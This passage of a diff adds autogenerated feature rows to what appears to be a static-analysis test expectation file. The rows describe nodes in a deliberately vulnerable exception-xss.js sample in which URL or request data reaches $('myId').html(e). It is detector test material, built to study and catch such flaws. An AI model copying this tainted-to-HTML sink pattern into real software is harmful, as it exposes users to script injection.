deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:25:174:29 | inner | contextSurroundingFunctionParameters | ()\n(resolve) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:25:174:29 | inner | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:25:174:29 | inner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:25:174:29 | inner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:25:174:43 | exceptional return of inner(foo, resolve) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:25:174:43 | exceptional return of inner(foo, resolve) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:25:174:43 | exceptional return of inner(foo, resolve) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:25:174:43 | exceptional return of inner(foo, resolve) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:25:174:43 | exceptional return of inner(foo, resolve) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:25:174:43 | inner(foo, resolve) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:25:174:43 | inner(foo, resolve) | contextSurroundingFunctionParameters | ()\n(resolve) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:25:174:43 | inner(foo, resolve) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:25:174:43 | inner(foo, resolve) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:25:174:43 | inner(foo, resolve) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:31:174:33 | foo | CalleeFlexibleAccessPath | inner | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:31:174:33 | foo | InputArgumentIndex | 0 | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:31:174:33 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:31:174:33 | foo | contextSurroundingFunctionParameters | ()\n(resolve) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:31:174:33 | foo | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:31:174:33 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:31:174:33 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:36:174:42 | resolve | CalleeFlexibleAccessPath | inner | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:36:174:42 | resolve | InputArgumentIndex | 1 | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:36:174:42 | resolve | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:36:174:42 | resolve | contextSurroundingFunctionParameters | ()\n(resolve) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:36:174:42 | resolve | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:36:174:42 | resolve | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:36:174:42 | resolve | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:46:174:50 | catch | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:46:174:50 | catch | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:46:174:50 | catch | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:46:174:50 | catch | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:46:174:50 | catch | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:52:176:2 | 'arguments' object of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:52:176:2 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:52:176:2 | 'arguments' object of anonymous function | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:52:176:2 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:52:176:2 | 'arguments' object of anonymous function | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:174:52:176:2 | (e) => ... T OK\\n\\t} | CalleeFlexibleAccessPath | Promise().catch | | autogenerated/Xss/ExceptionXss/exception-xss.js:174:52:176:2 | (e) => ... T OK\\n\\t} | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:174:52:176:2 | (e) => ... T OK\\n\\t} | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19338,6 +130758,56 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:174:52:176:2 | (e) => ... T OK\\n\\t} | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:174:52:176:2 | (e) => ... T OK\\n\\t} | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:174:52:176:2 | (e) => ... T OK\\n\\t} | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:52:176:2 | exceptional return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:52:176:2 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:52:176:2 | exceptional return of anonymous function | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:52:176:2 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:52:176:2 | exceptional return of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:52:176:2 | return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:52:176:2 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:52:176:2 | return of anonymous function | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:52:176:2 | return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:52:176:2 | return of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:53:174:53 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:53:174:53 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:53:174:53 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:53:174:53 | e | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:53:174:53 | e | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:53:174:53 | e | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:53:174:53 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:53:174:53 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:53:174:53 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:174:53:174:53 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:3 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:3 | $ | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:3 | $ | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:3 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:11 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:11 | $('myId') | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:11 | $('myId') | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:11 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:11 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:11 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:11 | exceptional return of $('myId') | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:11 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:11 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:16 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:16 | $('myId').html | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:16 | $('myId').html | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:16 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:16 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:19 | $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:19 | $('myId').html(e) | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:19 | $('myId').html(e) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:19 | $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:19 | $('myId').html(e) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:19 | exceptional return of $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:19 | exceptional return of $('myId').html(e) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:19 | exceptional return of $('myId').html(e) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:19 | exceptional return of $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:3:175:19 | exceptional return of $('myId').html(e) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:175:5:175:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:175:5:175:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:175:5:175:10 | 'myId' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19345,6 +130815,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:175:5:175:10 | 'myId' | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:175:5:175:10 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:175:5:175:10 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:13:175:16 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:13:175:16 | html | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:13:175:16 | html | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:13:175:16 | html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:175:13:175:16 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:175:18:175:18 | e | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:175:18:175:18 | e | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:175:18:175:18 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19352,6 +130827,21 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:175:18:175:18 | e | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:175:18:175:18 | e | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:175:18:175:18 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:1:179:3 | app | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:1:179:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:1:179:3 | app | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:1:179:7 | app.get | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:1:179:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:1:179:7 | app.get | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:1:186:2 | app.get ... \\t});\\n}) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:1:186:2 | app.get ... \\t});\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:1:186:2 | app.get ... \\t});\\n}) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:1:186:2 | exceptional return of app.get ... \\t});\\n}) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:1:186:2 | exceptional return of app.get ... \\t});\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:1:186:2 | exceptional return of app.get ... \\t});\\n}) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:5:179:7 | get | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:5:179:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:5:179:7 | get | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:179:9:179:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ExceptionXss/exception-xss.js:179:9:179:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:179:9:179:19 | '/user/:id' | calleeImports | express | @@ -19359,6 +130849,21 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:179:9:179:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ExceptionXss/exception-xss.js:179:9:179:19 | '/user/:id' | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:179:9:179:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:179:21 | this | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:179:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:179:21 | this | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:179:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:179:21 | this | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:186:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:186:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:186:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:186:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:186:1 | 'arguments' object of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:186:1 | exceptional return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:186:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:186:1 | exceptional return of anonymous function | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:186:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:186:1 | exceptional return of anonymous function | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:186:1 | functio ... \\n\\t});\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:186:1 | functio ... \\n\\t});\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:186:1 | functio ... \\n\\t});\\n} | calleeImports | express | @@ -19366,6 +130871,51 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:186:1 | functio ... \\n\\t});\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:186:1 | functio ... \\n\\t});\\n} | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:186:1 | functio ... \\n\\t});\\n} | receiverName | app | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:186:1 | return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:186:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:186:1 | return of anonymous function | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:186:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:22:186:1 | return of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:32:179:34 | req | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:32:179:34 | req | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:32:179:34 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:32:179:34 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:32:179:34 | req | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:32:179:34 | req | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:32:179:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:32:179:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:32:179:34 | req | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:32:179:34 | req | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:37:179:39 | res | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:37:179:39 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:37:179:39 | res | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:37:179:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:179:37:179:39 | res | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:2:180:8 | unknown | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:2:180:8 | unknown | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:2:180:8 | unknown | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:2:180:8 | unknown | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:2:180:8 | unknown | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:2:185:3 | exceptional return of unknown ... n. \\n\\t}) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:2:185:3 | exceptional return of unknown ... n. \\n\\t}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:2:185:3 | exceptional return of unknown ... n. \\n\\t}) | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:2:185:3 | exceptional return of unknown ... n. \\n\\t}) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:2:185:3 | exceptional return of unknown ... n. \\n\\t}) | fileImports | express 